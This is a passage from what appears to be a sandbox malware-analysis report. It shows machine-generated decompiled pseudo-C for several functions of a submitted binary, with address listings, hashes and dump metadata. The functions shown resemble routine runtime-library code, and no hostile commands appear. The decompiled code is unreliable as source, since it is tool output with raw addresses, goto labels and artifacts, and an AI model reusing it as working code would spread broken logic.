							__eflags = _t109 - 0x7f;
						} while (_t109 < 0x7f);
						_t111 = E004131F0(_t138 - 0x114, 0x44bd38, 0xfe);
						asm("sbb eax, eax");
						_t106 =  ~_t111 + 1;
						goto L17;
					}
					_t105 =  *(_t138 - 0x118);
					__eflags = _t105;
					if(_t105 != 0) {
						_t113 = 0x457590 + _t105 * 8;
						 *0x457590 =  *_t113;
						 *0x457594 =  *((intOrPtr*)(_t113 + 4));
						 *_t113 = _t126;
						_t126 =  *((intOrPtr*)(_t138 - 0x12c));
						 *((intOrPtr*)(_t113 + 4)) =  *((intOrPtr*)(_t138 - 0x12c));
					}
					goto L11;
				}
				_t76 =  *(_t116 + 0x4576cc);
				goto L28;
			}





















                                                                              0x00415c6c
                                                                              0x00415c6d
                                                                              0x00415c77
                                                                              0x00415c7c
                                                                              0x00415c7f
                                                                              0x00415c9f
                                                                              0x00415eee
                                                                              0x00415efa
                                                                              0x00415efa
                                                                              0x00415ca5
                                                                              0x00415ca9
                                                                              0x00415cbf
                                                                              0x00415cd7
                                                                              0x00415cdc
                                                                              0x00415ce0
                                                                              0x00415ce6
                                                                              0x00415eed
                                                                              0x00000000
                                                                              0x00415eed
                                                                              0x00415cf2
                                                                              0x00415cf3
                                                                              0x00415cf9
                                                                              0x00415d02
                                                                              0x00415d15
                                                                              0x00415d22
                                                                              0x00415d27
                                                                              0x00415d2c
                                                                              0x00415d41
                                                                              0x00415d4e
                                                                              0x00415d5f
                                                                              0x00415d67
                                                                              0x00415d6a
                                                                              0x00415e85
                                                                              0x00415e85
                                                                              0x00415e88
                                                                              0x00415e90
                                                                              0x00415e90
                                                                              0x00415e95
                                                                              0x00415e9b
                                                                              0x00415e9d
                                                                              0x00415ece
                                                                              0x00415ed8
                                                                              0x00415eda
                                                                              0x00415ee0
                                                                              0x00415ee5
                                                                              0x00415ee6
                                                                              0x00415e9f
                                                                              0x00415ea5
                                                                              0x00415eab
                                                                              0x00415eb1
                                                                              0x00415ebc
                                                                              0x00415ec4
                                                                              0x00415eca
                                                                              0x00415eca
                                                                              0x00000000
                                                                              0x00415eec
                                                                              0x00415d76
                                                                              0x00415d7c
                                                                              0x00415d7c
                                                                              0x00415d7c
                                                                              0x00415d83
                                                                              0x00415d88
                                                                              0x00415d8d
                                                                              0x00415d93
                                                                              0x00415d98
                                                                              0x00415d9e
                                                                              0x00415da0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415da4
                                                                              0x00415daa
                                                                              0x00415db2
                                                                              0x00415db8
                                                                              0x00415dbb
                                                                              0x00415dbe
                                                                              0x00415dc4
                                                                              0x00415dc7
                                                                              0x00415dcc
                                                                              0x00415dd2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00415e03
                                                                              0x00415e03
                                                                              0x00415e0a
                                                                              0x00415e7b
                                                                              0x00415e80
                                                                              0x00415e80
                                                                              0x00000000
                                                                              0x00415e80
                                                                              0x00415e0c
                                                                              0x00415e0e
                                                                              0x00415e1a
                                                                              0x00415e20
                                                                              0x00415e21
                                                                              0x00415e23
                                                                              0x00415e28
                                                                              0x00415e2a
                                                                              0x00415e32
                                                                              0x00415e34
                                                                              0x00415e66
                                                                              0x00415e66
                                                                              0x00415e68
                                                                              0x00415e68
                                                                              0x00415e6e
                                                                              0x00415e73
                                                                              0x00000000
                                                                              0x00415e73
                                                                              0x00415e36
                                                                              0x00415e36
                                                                              0x00415e38
                                                                              0x00415e38
                                                                              0x00415e40
                                                                              0x00415e41
                                                                              0x00415e41
                                                                              0x00415e57
                                                                              0x00415e61
                                                                              0x00415e63
                                                                              0x00000000
                                                                              0x00415e63
                                                                              0x00415dd6
                                                                              0x00415ddc
                                                                              0x00415dde
                                                                              0x00415de0
                                                                              0x00415de9
                                                                              0x00415df2
                                                                              0x00415df8
                                                                              0x00415dfa
                                                                              0x00415e00
                                                                              0x00415e00
                                                                              0x00000000
                                                                              0x00415dde
                                                                              0x00415cc1
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: _strcat_strlen
                                                                              • String ID: 0uE
                                                                              • API String ID: 432593777-2413036590
                                                                              • Opcode ID: 5a76f18916adc4f3bd8b7883d2e193f96d551a90fbd8f1e348faac662e0287b8
                                                                              • Instruction ID: 47e724a208c613d35e2dce768da74c778b1b737601ef56c47e278f2d06f61657
                                                                              • Opcode Fuzzy Hash: 5a76f18916adc4f3bd8b7883d2e193f96d551a90fbd8f1e348faac662e0287b8
                                                                              • Instruction Fuzzy Hash: 45712971904319DFDB24DF24ED81ADAB7F8EB48301F1045AAE909D7262E734DA91CF98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041354C, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 65%
                                                                              			E0041354C(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v21;
				signed char _v22;
				struct _cpinfo _v28;
				char _v284;
				char _v540;
				char _v796;
				char _v1308;
				void* __ebp;
				intOrPtr _t42;
				signed int _t45;
				char _t47;
				signed char _t48;
				signed int _t58;
				signed int _t59;
				signed int _t65;
				signed int _t68;
				signed char _t70;
				char _t71;
				signed int _t73;
				signed int _t74;
				signed char* _t78;
				signed char* _t79;
				void* _t81;
				void* _t86;
				void* _t87;

				_t80 = __edi;
				_t63 = __ebx;
				_t42 =  *0x457184; // 0xb7aa1229
				_v8 = _t42;
				if(GetCPInfo( *0x45bd64,  &_v28) != 1) {
					_t45 = 0;
					__eflags = 0;
					do {
						__eflags = _t45 - 0x41;
						if(_t45 < 0x41) {
							L23:
							__eflags = _t45 - 0x61;
							if(_t45 < 0x61) {
								L26:
								 *(_t45 + 0x45bd80) = 0;
							} else {
								__eflags = _t45 - 0x7a;
								if(_t45 > 0x7a) {
									goto L26;
								} else {
									 *(_t45 + 0x45bc61) =  *(_t45 + 0x45bc61) | 0x00000020;
									_t68 = _t45 - 0x20;
									goto L22;
								}
							}
						} else {
							__eflags = _t45 - 0x5a;
							if(_t45 > 0x5a) {
								goto L23;
							} else {
								 *(_t45 + 0x45bc61) =  *(_t45 + 0x45bc61) | 0x00000010;
								_t68 = _t45 + 0x20;
								__eflags = _t68;
								L22:
								 *(_t45 + 0x45bd80) = _t68;
							}
						}
						_t45 = _t45 + 1;
						__eflags = _t45 - 0x100;
					} while (_t45 < 0x100);
				} else {
					_t47 = 0;
					do {
						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
						_t47 = _t47 + 1;
					} while (_t47 < 0x100);
					_t48 = _v22;
					_v284 = 0x20;
					if(_t48 != 0) {
						_push(__ebx);
						_t78 =  &_v21;
						_push(__edi);
						do {
							_t65 =  *_t78 & 0x000000ff;
							_t59 = _t48 & 0x000000ff;
							if(_t59 <= _t65) {
								_t73 = _t65 - _t59 + 1;
								_t74 = _t73 >> 2;
								_t81 = _t86 + _t59 - 0x118;
								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
								_t87 = _t87 + 0x18;
								_t65 = 0;
							}
							_t79 =  &(_t78[1]);
							_t48 =  *_t79;
							_t78 =  &(_t79[1]);
							_t96 = _t48;
						} while (_t48 != 0);
						_pop(_t80);
						_pop(_t63);
					}
					_push(0);
					_push( *0x45bc4c);
					_push( *0x45bd64);
					_push( &_v1308);
					_push(0x100);
					_push( &_v284);
					_push(1);
					E00419914(_t63, _t65, _t80, 0x100, _t96);
					_push(0);
					_push( *0x45bd64);
					_push(0x100);
					_push( &_v540);
					_push(0x100);
					_push( &_v284);
					_push(0x100);
					_push( *0x45bc4c);
					E00419558(_t63, _t80, 0x100, _t96);
					_push(0);
					_push( *0x45bd64);
					_push(0x100);
					_push( &_v796);
					_push(0x100);
					_push( &_v284);
					_push(0x200);
					_push( *0x45bc4c);
					E00419558(_t63, _t80, 0x100, _t96);
					_t58 = 0;
					do {
						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
						if((_t70 & 0x00000001) == 0) {
							__eflags = _t70 & 0x00000002;
							if((_t70 & 0x00000002) == 0) {
								 *((char*)(_t58 + 0x45bd80)) = 0;
							} else {
								 *(_t58 + 0x45bc61) =  *(_t58 + 0x45bc61) | 0x00000020;
								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
								goto L12;
							}
						} else {
							 *(_t58 + 0x45bc61) =  *(_t58 + 0x45bc61) | 0x00000010;
							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
							L12:
							 *((char*)(_t58 + 0x45bd80)) = _t71;
						}
						_t58 = _t58 + 1;
					} while (_t58 < 0x100);
				}
				return E00412FBB(_t45, _v8);
			}





























                                                                              0x0041354c
                                                                              0x0041354c
                                                                              0x00413555
                                                                              0x0041355a
                                                                              0x00413576
                                                                              0x00413689
                                                                              0x00413689
                                                                              0x0041368b
                                                                              0x0041368b
                                                                              0x0041368e
                                                                              0x004136a9
                                                                              0x004136a9
                                                                              0x004136ac
                                                                              0x004136c1
                                                                              0x004136c1
                                                                              0x004136ae
                                                                              0x004136ae
                                                                              0x004136b1
                                                                              0x00000000
                                                                              0x004136b3
                                                                              0x004136b3
                                                                              0x004136bc
                                                                              0x00000000
                                                                              0x004136bc
                                                                              0x004136b1
                                                                              0x00413690
                                                                              0x00413690
                                                                              0x00413693
                                                                              0x00000000
                                                                              0x00413695
                                                                              0x00413695
                                                                              0x0041369e
                                                                              0x0041369e
                                                                              0x004136a1
                                                                              0x004136a1
                                                                              0x004136a1
                                                                              0x00413693
                                                                              0x004136c8
                                                                              0x004136c9
                                                                              0x004136c9
                                                                              0x0041357c
                                                                              0x0041357c
                                                                              0x0041357e
                                                                              0x0041357e
                                                                              0x00413585
                                                                              0x00413586
                                                                              0x0041358a
                                                                              0x0041358f
                                                                              0x00413596
                                                                              0x00413598
                                                                              0x00413599
                                                                              0x0041359c
                                                                              0x0041359d
                                                                              0x0041359d
                                                                              0x004135a0
                                                                              0x004135a5
                                                                              0x004135a9
                                                                              0x004135ac
                                                                              0x004135af
                                                                              0x004135c2
                                                                              0x004135c2
                                                                              0x004135c2
                                                                              0x004135c2
                                                                              0x004135c4
                                                                              0x004135c5
                                                                              0x004135c7
                                                                              0x004135c8
                                                                              0x004135c8
                                                                              0x004135cc
                                                                              0x004135cd
                                                                              0x004135cd
                                                                              0x004135ce
                                                                              0x004135d0
                                                                              0x004135dc
                                                                              0x004135e2
                                                                              0x004135e3
                                                                              0x004135ea
                                                                              0x004135eb
                                                                              0x004135ed
                                                                              0x004135f2
                                                                              0x004135f4
                                                                              0x00413600
                                                                              0x00413601
                                                                              0x00413602
                                                                              0x00413609
                                                                              0x0041360a
                                                                              0x0041360b
                                                                              0x00413611
                                                                              0x00413616
                                                                              0x00413618
                                                                              0x00413624
                                                                              0x00413625
                                                                              0x00413626
                                                                              0x0041362d
                                                                              0x0041362e
                                                                              0x00413633
                                                                              0x00413639
                                                                              0x00413641
                                                                              0x00413643
                                                                              0x00413643
                                                                              0x0041364e
                                                                              0x00413666
                                                                              0x00413669
                                                                              0x0041367b
                                                                              0x0041366b
                                                                              0x0041366b
                                                                              0x00413672
                                                                              0x00000000
                                                                              0x00413672
                                                                              0x00413650
                                                                              0x00413650
                                                                              0x00413657
                                                                              0x0041365e
                                                                              0x0041365e
                                                                              0x0041365e
                                                                              0x00413682
                                                                              0x00413683
                                                                              0x00413687
                                                                              0x004136d7

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Info
                                                                              • String ID: $
                                                                              • API String ID: 1807457897-3032137957
                                                                              • Opcode ID: 99aa7142370eae45eb59a97ffc4110fe66870ff66ab62381b5d1e9af5e93636a
                                                                              • Instruction ID: a1e0cf95d1cb9a8f66a2547962cf775c676343c899b257a01c873b7714aafa0f
                                                                              • Opcode Fuzzy Hash: 99aa7142370eae45eb59a97ffc4110fe66870ff66ab62381b5d1e9af5e93636a
                                                                              • Instruction Fuzzy Hash: 6D41F2301003586EEB228F18DC59BFA7BA9DB05706F2404EAE545D7263CB684B95DBDC
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401D2E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 92%
                                                                              			E00401D2E(void* __eflags) {
				void* _t51;
				intOrPtr _t54;
				signed int _t83;
				void* _t97;
				intOrPtr* _t100;
				void* _t102;
				void* _t104;

				E004128A0(E00430411, _t102);
				 *((intOrPtr*)(_t102 - 0x10)) = _t104 - 0x14;
				_t83 = 0;
				 *(_t102 - 0x14) = 0;
				_t51 = E00411A30( *((intOrPtr*)(_t102 + 0xc)));
				_t100 =  *((intOrPtr*)(_t102 + 8));
				_t97 = _t51;
				_t54 =  *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x18));
				if(_t54 > 0 && _t54 > _t97) {
					_t83 = _t54 - _t97;
				}
				_push(_t100);
				E00401A1E(_t102 - 0x20);
				 *(_t102 - 4) =  *(_t102 - 4) & 0x00000000;
				if( *((char*)(_t102 - 0x1c)) != 0) {
					 *(_t102 - 4) = 1;
					if(( *( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x10) & 0x000001c0) == 0x40) {
						L10:
						_push(_t97);
						_push( *((intOrPtr*)(_t102 + 0xc)));
						if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x28)))) + 0x1c))() == _t97) {
							while(_t83 > 0) {
								 *((char*)(_t102 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x30));
								if(E00401939( *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x28)),  *((intOrPtr*)(_t102 - 0x18))) != 0xffffffff) {
									_t83 = _t83 - 1;
									continue;
								} else {
									 *(_t102 - 0x14) =  *(_t102 - 0x14) | 0x00000004;
									goto L12;
								}
								L19:
							}
						} else {
							 *(_t102 - 0x14) = 4;
						}
					} else {
						while(_t83 > 0) {
							 *((char*)(_t102 - 0x18)) =  *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x30));
							if(E00401939( *((intOrPtr*)( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x28)),  *((intOrPtr*)(_t102 - 0x18))) != 0xffffffff) {
								_t83 = _t83 - 1;
								continue;
							} else {
								 *(_t102 - 0x14) =  *(_t102 - 0x14) | 0x00000004;
							}
							break;
						}
						if( *(_t102 - 0x14) == 0) {
							goto L10;
						}
					}
					L12:
					 *( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x18) =  *( *((intOrPtr*)( *_t100 + 4)) + _t100 + 0x18) & 0x00000000;
				} else {
					 *(_t102 - 0x14) = 4;
				}
				 *(_t102 - 4) =  *(_t102 - 4) & 0x00000000;
				E0040191E( *((intOrPtr*)( *_t100 + 4)) + _t100,  *(_t102 - 0x14), 0);
				 *(_t102 - 4) =  *(_t102 - 4) | 0xffffffff;
				E00401C87(_t102 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t102 - 0xc));
				return _t100;
				goto L19;
			}










                                                                              0x00401d33
                                                                              0x00401d3e
                                                                              0x00401d44
                                                                              0x00401d46
                                                                              0x00401d49
                                                                              0x00401d4e
                                                                              0x00401d51
                                                                              0x00401d58
                                                                              0x00401d5f
                                                                              0x00401d67
                                                                              0x00401d67
                                                                              0x00401d69
                                                                              0x00401d6d
                                                                              0x00401d72
                                                                              0x00401d7a
                                                                              0x00401d99
                                                                              0x00401d9d
                                                                              0x00401dcc
                                                                              0x00401dd7
                                                                              0x00401dd8
                                                                              0x00401de0
                                                                              0x00401df9
                                                                              0x00401e0a
                                                                              0x00401e1a
                                                                              0x00401e22
                                                                              0x00000000
                                                                              0x00401e1c
                                                                              0x00401e1c
                                                                              0x00000000
                                                                              0x00401e1c
                                                                              0x00000000
                                                                              0x00401e1a
                                                                              0x00401de2
                                                                              0x00401de2
                                                                              0x00401de2
                                                                              0x00401d9f
                                                                              0x00401d9f
                                                                              0x00401db0
                                                                              0x00401dc0
                                                                              0x00401df6
                                                                              0x00000000
                                                                              0x00401dc2
                                                                              0x00401dc2
                                                                              0x00401dc2
                                                                              0x00000000
                                                                              0x00401dc0
                                                                              0x00401dca
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00401dca
                                                                              0x00401de9
                                                                              0x00401df0
                                                                              0x00401d7c
                                                                              0x00401d7c
                                                                              0x00401d7c
                                                                              0x00401e4b
                                                                              0x00401e56
                                                                              0x00401e5b
                                                                              0x00401e62
                                                                              0x00401e6e
                                                                              0x00401e77
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog_strlen
                                                                              • String ID: ,D
                                                                              • API String ID: 3871006878-2732034087
                                                                              • Opcode ID: 4fef6bd09adf085d1fcd714fd990fa812df3eeede1ba5c4f6a660a67405dfdce
                                                                              • Instruction ID: c515110007080e5e4696b1ce805c37cc91c6fc4dd46f766397bb9d3daa8a8093
                                                                              • Opcode Fuzzy Hash: 4fef6bd09adf085d1fcd714fd990fa812df3eeede1ba5c4f6a660a67405dfdce
                                                                              • Instruction Fuzzy Hash: 6D415E34601205CFDB14CF99C995BAEBBF4AF18328F24456AE551A73B2C378EE40CB85
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00417B7F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 84%
                                                                              			E00417B7F(void* __edx, signed int _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t50;
				signed int _t51;
				signed short _t55;
				signed int _t59;
				void* _t60;
				signed int _t69;
				void* _t80;
				signed int _t83;
				signed int* _t86;

				_t80 = __edx;
				_t86 = _a8;
				_t50 = _t86[3];
				_t69 = _t86[4];
				if((_t50 & 0x00000082) == 0 || (_t50 & 0x00000040) != 0) {
					L24:
					_t51 = _t50 | 0x00000020;
					__eflags = _t51;
					_t86[3] = _t51;
					goto L25;
				} else {
					if((_t50 & 0x00000001) == 0) {
						L5:
						_t86[1] = _t86[1] & 0x00000000;
						_a8 = _a8 & 0x00000000;
						_t55 = _t86[3] & 0xffffffef | 0x00000002;
						_t86[3] = _t55;
						if((_t55 & 0x0000010c) != 0) {
							L10:
							if((_t86[3] & 0x00000108) == 0) {
								_t83 = 1;
								__eflags = 1;
								_push(1);
								_push( &_a4);
								_push(_t69);
								_t51 = E0041CB1F(_t69, _t80, 1, _t86, 1);
								_a8 = _t51;
								L21:
								if(_a8 == _t83) {
									return _a4 & 0x000000ff;
								}
								_t86[3] = _t86[3] | 0x00000020;
								L25:
								return _t51 | 0xffffffff;
							}
							_t59 = _t86[2];
							 *_t86 = _t59 + 1;
							_t83 =  *_t86 - _t59;
							_t100 = _t83;
							_t86[1] = _t86[6] - 1;
							if(_t83 <= 0) {
								__eflags = _t69 - 0xffffffff;
								if(_t69 == 0xffffffff) {
									_t60 = 0x457840;
								} else {
									_t60 =  *((intOrPtr*)(0x45bb20 + (_t69 >> 5) * 4)) + ((_t69 & 0x0000001f) + (_t69 & 0x0000001f) * 8) * 4;
								}
								__eflags =  *(_t60 + 4) & 0x00000020;
								if(__eflags == 0) {
									L19:
									_t51 = _t86[2];
									 *_t51 = _a4;
									goto L21;
								} else {
									_push(2);
									_push(0);
									_push(_t69);
									E0041C8A6(_t69, _t83, _t86, __eflags);
									L18:
									goto L19;
								}
							}
							_push(_t83);
							_push(_t59);
							_push(_t69);
							_a8 = E0041CB1F(_t69, _t80, _t83, _t86, _t100);
							goto L18;
						}
						if(_t86 == 0x457ae8 || _t86 == 0x457b08) {
							if(E0041CC0E(_t69) != 0) {
								goto L10;
							}
							goto L9;
						} else {
							L9:
							E0041CBCA(_t86);
							goto L10;
						}
					}
					_t86[1] = _t86[1] & 0x00000000;
					if((_t50 & 0x00000010) == 0) {
						goto L24;
					}
					 *_t86 = _t86[2];
					_t86[3] = _t50 & 0xfffffffe;
					goto L5;
				}
			}
















                                                                              0x00417b7f
                                                                              0x00417b84
                                                                              0x00417b87
                                                                              0x00417b8c
                                                                              0x00417b8f
                                                                              0x00417c8b
                                                                              0x00417c8b
                                                                              0x00417c8b
                                                                              0x00417c8e
                                                                              0x00000000
                                                                              0x00417b9d
                                                                              0x00417b9f
                                                                              0x00417bb8
                                                                              0x00417bbb
                                                                              0x00417bbf
                                                                              0x00417bc6
                                                                              0x00417bcd
                                                                              0x00417bd0
                                                                              0x00417bf4
                                                                              0x00417bfb
                                                                              0x00417c63
                                                                              0x00417c63
                                                                              0x00417c64
                                                                              0x00417c68
                                                                              0x00417c69
                                                                              0x00417c6a
                                                                              0x00417c72
                                                                              0x00417c75
                                                                              0x00417c79
                                                                              0x00000000
                                                                              0x00417c84
                                                                              0x00417c7b
                                                                              0x00417c91
                                                                              0x00000000
                                                                              0x00417c91
                                                                              0x00417bfd
                                                                              0x00417c05
                                                                              0x00417c0a
                                                                              0x00417c0d
                                                                              0x00417c0f
                                                                              0x00417c12
                                                                              0x00417c21
                                                                              0x00417c24
                                                                              0x00417c3f
                                                                              0x00417c26
                                                                              0x00417c3a
                                                                              0x00417c3a
                                                                              0x00417c44
                                                                              0x00417c48
                                                                              0x00417c57
                                                                              0x00417c57
                                                                              0x00417c5d
                                                                              0x00000000
                                                                              0x00417c4a
                                                                              0x00417c4a
                                                                              0x00417c4c
                                                                              0x00417c4e
                                                                              0x00417c4f
                                                                              0x00417c54
                                                                              0x00000000
                                                                              0x00417c54
                                                                              0x00417c48
                                                                              0x00417c14
                                                                              0x00417c15
                                                                              0x00417c16
                                                                              0x00417c1c
                                                                              0x00000000
                                                                              0x00417c1c
                                                                              0x00417bd8
                                                                              0x00417beb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417bed
                                                                              0x00417bed
                                                                              0x00417bee
                                                                              0x00000000
                                                                              0x00417bf3
                                                                              0x00417bd8
                                                                              0x00417ba1
                                                                              0x00417ba7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00417bb3
                                                                              0x00417bb5
                                                                              0x00000000
                                                                              0x00417bb5

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: __getbuf
                                                                              • String ID: @xE$zE
                                                                              • API String ID: 554500569-1012254608
                                                                              • Opcode ID: 8e6ef69631a81af98d2147c48e0c2b2943f1a9fa26f545baf9991f21b2dda224
                                                                              • Instruction ID: 6acc455c36f27614f13c3cf7468f4bf721d5ddce4ef2ce29d7a5501ca18d220c
                                                                              • Opcode Fuzzy Hash: 8e6ef69631a81af98d2147c48e0c2b2943f1a9fa26f545baf9991f21b2dda224
                                                                              • Instruction Fuzzy Hash: D131C6315087049FD7308F19D881AA6B7B4DF41364F04892EE8AA8B381E73CE9848B48
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00407F26, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 94%
                                                                              			E00407F26(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				void* _t41;
				void* _t43;
				void* _t45;
				void* _t55;
				void* _t57;
				void* _t59;
				void* _t60;
				void* _t75;
				void* _t83;
				void* _t86;
				char* _t87;
				void* _t90;
				void* _t92;
				void* _t96;

				_t96 = __eflags;
				E004128A0(E00430CD1, _t90);
				_t60 = __ecx;
				_t32 = E00428A50();
				_t82 =  *_t32;
				 *((intOrPtr*)(_t90 - 0x10)) =  *((intOrPtr*)( *_t32 + 0xc))(_t83, _t86, _t59) + 0x10;
				 *(_t90 - 4) =  *(_t90 - 4) & 0x00000000;
				E004063E4(E0040669E(0x458420));
				E0040763F(_t90 - 0x10, "LastName LIKE ");
				E00425C57(_t60);
				_t87 = "\'";
				_t41 = E00407A53(_t60);
				 *(_t90 - 4) = 1;
				_t43 = E004079E3(_t60 + 0x124, _t96);
				 *(_t90 - 4) = 2;
				_t45 = E00407A53(_t60 + 0x124);
				 *(_t90 - 4) = 3;
				E004075F2(_t60, _t90 - 0x10, _t90, _t45);
				E00401000( *((intOrPtr*)(_t90 - 0x14)) + 0xfffffff0,  *_t32);
				E00401000( *((intOrPtr*)(_t90 - 0x18)) + 0xfffffff0,  *_t32);
				_t75 =  *((intOrPtr*)(_t90 - 0x1c)) + 0xfffffff0;
				 *(_t90 - 4) = 0;
				E00401000(_t75, _t82);
				 *((short*)(_t90 - 0x2c)) = 8;
				 *((intOrPtr*)(_t90 - 0x24)) = E0041FCB0(_t75, 0x4326f8);
				_t88 =  *((intOrPtr*)(_t90 - 0x10));
				 *((intOrPtr*)(_t90 - 0x1c)) = _t92 - 0x20 + 0x24;
				 *(_t90 - 4) = 4;
				E0040678C(_t92 - 0x20 + 0x24);
				 *(_t90 - 4) = 4;
				E00407310(E0040669E(0x458420));
				_t55 = _t90 - 0x2c;
				 *(_t90 - 4) = 0;
				__imp__#9(_t55,  *((intOrPtr*)(_t90 - 0x10)), _t75, 0, 1, _t90 - 0x2c, _t90 - 0x14, _t43, _t87, _t90 - 0x18, _t41, _t60 + 0x124, _t90 - 0x1c, _t90 - 0x10, _t87, 1);
				if(_t55 < 0) {
					E0041FC30(_t55);
				}
				E00407664(_t60, _t60, 0x458420, _t88);
				_t57 = E00401000(_t88 - 0x10, _t82);
				 *[fs:0x0] =  *((intOrPtr*)(_t90 - 0xc));
				return _t57;
			}





















                                                                              0x00407f26
                                                                              0x00407f2b
                                                                              0x00407f36
                                                                              0x00407f38
                                                                              0x00407f3d
                                                                              0x00407f47
                                                                              0x00407f4a
                                                                              0x00407f5c
                                                                              0x00407f69
                                                                              0x00407f72
                                                                              0x00407f77
                                                                              0x00407f85
                                                                              0x00407f96
                                                                              0x00407f9a
                                                                              0x00407fa5
                                                                              0x00407fa9
                                                                              0x00407fb5
                                                                              0x00407fb9
                                                                              0x00407fc4
                                                                              0x00407fcf
                                                                              0x00407fd7
                                                                              0x00407fda
                                                                              0x00407fde
                                                                              0x00407fe8
                                                                              0x00407ff3
                                                                              0x00407ff6
                                                                              0x00408004
                                                                              0x00408008
                                                                              0x0040800c
                                                                              0x00408013
                                                                              0x0040801e
                                                                              0x00408023
                                                                              0x00408027
                                                                              0x0040802b
                                                                              0x00408033
                                                                              0x00408036
                                                                              0x00408036
                                                                              0x0040803d
                                                                              0x00408045
                                                                              0x0040804f
                                                                              0x00408058

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 00407F2B
